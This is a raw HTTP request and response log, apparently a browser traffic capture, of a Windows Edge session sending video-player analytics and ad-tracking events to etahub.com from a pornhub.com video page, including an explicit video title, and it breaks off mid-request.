GET /events?app_id=10896&eventName=adroll_response&nosVersion=10&nstartPoint=0&nvd=900&nvid=457809091&nvt=1728144256&scampaignId=953201802&sfeatureName=adroll_response&sfeatureValue=campaign&sformat=json&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4 HTTP/2.0
host: etahub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

access-control-allow-origin: *
access-control-allow-methods: GET, POST
access-control-allow-credentials: true
cache-control: no-cache, no-transform
content-disposition: inline
x-content-type-options: nosniff
x-xss-protection: 0
pragma: no-cache
timing-allow-origin: *
content-length: 39
content-type: application/json
GET

https://etahub.com/events?app_id=10896&eventName=playerLoaded&ndate=1728144259187&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&scdnHostname=haproxy&sfeatureName=playerLoaded&sfeatureValue=desktop&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&svideoTitle=Fake%20Driving%20School%20-%20Test%20my%20TITS%20and%20then%20fuck%20my%20ASS&sws=981bc45223f3bab3dc4aea990c3531b4

msedge.exe

Remote address:

66.254.114.62:443

Request

GET /events?app_id=10896&eventName=playerLoaded&ndate=1728144259187&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&scdnHostname=haproxy&sfeatureName=playerLoaded&sfeatureValue=desktop&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&svideoTitle=Fake%20Driving%20School%20-%20Test%20my%20TITS%20and%20then%20fuck%20my%20ASS&sws=981bc45223f3bab3dc4aea990c3531b4 HTTP/2.0
host: etahub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

access-control-allow-origin: *
access-control-allow-methods: GET, POST
access-control-allow-credentials: true
cache-control: no-cache, no-transform
content-disposition: inline
x-content-type-options: nosniff
x-xss-protection: 0
pragma: no-cache
timing-allow-origin: *
content-length: 39
content-type: application/json
GET

https://etahub.com/events?app_id=10829&splayer=&eventName=play&ssite=https%3A%2F%2Ftrack.thuis.nl%2Fa46ebf7f-8278-4f2b-9b07-d651d9143af4%3FCampaignID%3D1010869731%26SpotName%3DPornhub%2BPC%2B-%2BPreroll%26BLPName%3D%7BBLPName%7D%26SiteName%3DPornhub&scampaign=TJ%20Campaign&ssiteName=pornhub&splatform=PC&sadTitle=TJDelivery&ntimeout_tier=1&nstartPoint=0

msedge.exe

Remote address:

66.254.114.62:443

Request

GET /events?app_id=10829&splayer=&eventName=play&ssite=https%3A%2F%2Ftrack.thuis.nl%2Fa46ebf7f-8278-4f2b-9b07-d651d9143af4%3FCampaignID%3D1010869731%26SpotName%3DPornhub%2BPC%2B-%2BPreroll%26BLPName%3D%7BBLPName%7D%26SiteName%3DPornhub&scampaign=TJ%20Campaign&ssiteName=pornhub&splatform=PC&sadTitle=TJDelivery&ntimeout_tier=1&nstartPoint=0 HTTP/2.0
host: etahub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

access-control-allow-origin: *
access-control-allow-methods: GET, POST
access-control-allow-credentials: true
cache-control: no-cache, no-transform
content-disposition: inline
x-content-type-options: nosniff
x-xss-protection: 0
pragma: no-cache
timing-allow-origin: *
content-length: 39
content-type: application/json
GET

https://etahub.com/events?app_id=10896&eventName=adroll_tracking&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=adroll_tracking&sfeatureValue=start&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4

msedge.exe

Remote address:

66.254.114.62:443

Request

GET /events?app_id=10896&eventName=adroll_tracking&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=adroll_tracking&sfeatureValue=start&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4 HTTP/2.0
host: etahub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

access-control-allow-origin: *
access-control-allow-methods: GET, POST
access-control-allow-credentials: true
cache-control: no-cache, no-transform
content-disposition: inline
x-content-type-options: nosniff
x-xss-protection: 0
pragma: no-cache
timing-allow-origin: *
content-length: 39
content-type: application/json
GET

https://etahub.com/events?app_id=10896&eventName=adroll_tracking&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=adroll_tracking&sfeatureValue=firstQuartile&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4

msedge.exe

Remote address:

66.254.114.62:443

Request

GET /events?app_id=10896&eventName=adroll_tracking&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=adroll_tracking&sfeatureValue=firstQuartile&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4 HTTP/2.0
host: etahub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

access-control-allow-origin: *
access-control-allow-methods: GET, POST
access-control-allow-credentials: true
cache-control: no-cache, no-transform
content-disposition: inline
x-content-type-options: nosniff
x-xss-protection: 0
pragma: no-cache
timing-allow-origin: *
content-length: 39
content-type: application/json
GET

https://etahub.com/events?app_id=10896&eventName=adroll_tracking&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=adroll_tracking&sfeatureValue=midpoint&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4

msedge.exe

Remote address:

66.254.114.62:443

Request

GET /events?app_id=10896&eventName=adroll_tracking&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=adroll_tracking&sfeatureValue=midpoint&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4 HTTP/2.0
host: etahub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

access-control-allow-origin: *
access-control-allow-methods: GET, POST
access-control-allow-credentials: true
cache-control: no-cache, no-transform
content-disposition: inline
x-content-type-options: nosniff
x-xss-protection: 0
pragma: no-cache
timing-allow-origin: *
content-length: 39
content-type: application/json
GET

https://etahub.com/events?app_id=10896&eventName=adroll_tracking&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=adroll_tracking&sfeatureValue=thirdQuartile&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4

msedge.exe

Remote address:

66.254.114.62:443

Request

GET /events?app_id=10896&eventName=adroll_tracking&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=adroll_tracking&sfeatureValue=thirdQuartile&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4 HTTP/2.0
host: etahub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

access-control-allow-origin: *
access-control-allow-methods: GET, POST
access-control-allow-credentials: true
cache-control: no-cache, no-transform
content-disposition: inline
x-content-type-options: nosniff
x-xss-protection: 0
pragma: no-cache
timing-allow-origin: *
content-length: 39
content-type: application/json
GET

https://etahub.com/events?app_id=10896&eventName=adroll_tracking&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=adroll_tracking&sfeatureValue=pause&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4

msedge.exe

Remote address:

66.254.114.62:443

Request

GET /events?app_id=10896&eventName=adroll_tracking&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=adroll_tracking&sfeatureValue=pause&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4 HTTP/2.0
host: etahub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

access-control-allow-origin: *
access-control-allow-methods: GET, POST
access-control-allow-credentials: true
cache-control: no-cache, no-transform
content-disposition: inline
x-content-type-options: nosniff
x-xss-protection: 0
pragma: no-cache
timing-allow-origin: *
content-length: 39
content-type: application/json
GET

https://etahub.com/events?app_id=10896&eventName=adroll_tracking&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=adroll_tracking&sfeatureValue=complete&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4

msedge.exe

Remote address:

66.254.114.62:443

Request

GET /events?app_id=10896&eventName=adroll_tracking&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=adroll_tracking&sfeatureValue=complete&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4 HTTP/2.0
host: etahub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

access-control-allow-origin: *
access-control-allow-methods: GET, POST
access-control-allow-credentials: true
cache-control: no-cache, no-transform
content-disposition: inline
x-content-type-options: nosniff
x-xss-protection: 0
pragma: no-cache
timing-allow-origin: *
content-length: 39
content-type: application/json
GET

https://etahub.com/events?app_id=10896&bfeatureValue=true&eventName=fullscreenBtn&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=fullscreenBtn&sfsTime=undefined&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&sres=1280x720&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4

msedge.exe

Remote address:

66.254.114.62:443

Request

GET /events?app_id=10896&bfeatureValue=true&eventName=fullscreenBtn&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=fullscreenBtn&sfsTime=undefined&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&sres=1280x720&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4 HTTP/2.0
host: etahub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

access-control-allow-origin: *
access-control-allow-methods: GET, POST
access-control-allow-credentials: true
cache-control: no-cache, no-transform
content-disposition: inline
x-content-type-options: nosniff
x-xss-protection: 0
pragma: no-cache
timing-allow-origin: *
content-length: 39
content-type: application/json
GET

https://etahub.com/events?app_id=10896&bfeatureValue=false&eventName=fullscreenArea&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=fullscreenArea&sfsTime=0&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&sres=1280x720&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4

msedge.exe

Remote address:

66.254.114.62:443

Request

GET /events?app_id=10896&bfeatureValue=false&eventName=fullscreenArea&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=fullscreenArea&sfsTime=0&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&sres=1280x720&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4 HTTP/2.0
host: etahub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

access-control-allow-origin: *
access-control-allow-methods: GET, POST
access-control-allow-credentials: true
cache-control: no-cache, no-transform
content-disposition: inline
x-content-type-options: nosniff
x-xss-protection: 0
pragma: no-cache
timing-allow-origin: *
content-length: 39
content-type: application/json
GET

https://etahub.com/events?app_id=10896&bfeatureValue=true&eventName=fullscreenBtn&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=fullscreenBtn&sfsTime=undefined&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&sres=1280x720&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4

msedge.exe

Remote address:

66.254.114.62:443

Request

GET /events?app_id=10896&bfeatureValue=true&eventName=fullscreenBtn&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=fullscreenBtn&sfsTime=undefined&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&sres=1280x720&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4 HTTP/2.0
host: etahub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

access-control-allow-origin: *
access-control-allow-methods: GET, POST
access-control-allow-credentials: true
cache-control: no-cache, no-transform
content-disposition: inline
x-content-type-options: nosniff
x-xss-protection: 0
pragma: no-cache
timing-allow-origin: *
content-length: 39
content-type: application/json
GET

https://etahub.com/events?app_id=10948&eventName=timewatched&featureName=timewatched&featureValue=5&h=www.pornhub.com&msid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&orientation=desktopMode&osName=Windows&osVersion=10&platform=desktop&playerName=desktop&playerVersion=8.1.0_240905.551&ps=videoPage&pt=5&rf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&siteName=pornhub&vd=900&vid=457809091&vt=1728144256&ws=981bc45223f3bab3dc4aea990c3531b4

msedge.exe

Remote address:

66.254.114.62:443

Request

GET /events?app_id=10948&eventName=timewatched&featureName=timewatched&featureValue=5&h=www.pornhub.com&msid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&orientation=desktopMode&osName=Windows&osVersion=10&platform=desktop&playerName=desktop&playerVersion=8.1.0_240905.551&ps=videoPage&pt=5&rf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&siteName=pornhub&vd=900&vid=457809091&vt=1728144256&ws=981bc45223f3bab3dc4aea990c3531b4 HTTP/2.0
host: etahub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

access-control-allow-origin: *
content-length: 2
content-type: application/json
GET

https://etahub.com/events?app_id=10896&bfeatureValue=false&eventName=fullscreenArea&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=fullscreenArea&sfsTime=2&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&sres=1280x720&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4

msedge.exe

Remote address:

66.254.114.62:443

Request

GET /events?app_id=10896&bfeatureValue=false&eventName=fullscreenArea&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=fullscreenArea&sfsTime=2&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&sres=1280x720&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4 HTTP/2.0
host: etahub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

access-control-allow-origin: *
access-control-allow-methods: GET, POST
access-control-allow-credentials: true
cache-control: no-cache, no-transform
content-disposition: inline
x-content-type-options: nosniff
x-xss-protection: 0
pragma: no-cache
timing-allow-origin: *
content-length: 39
content-type: application/json
GET

https://etahub.com/events?app_id=10896&bfeatureValue=false&eventName=chromecast&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=chromecast&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4

msedge.exe

Remote address:

66.254.114.62:443

Request

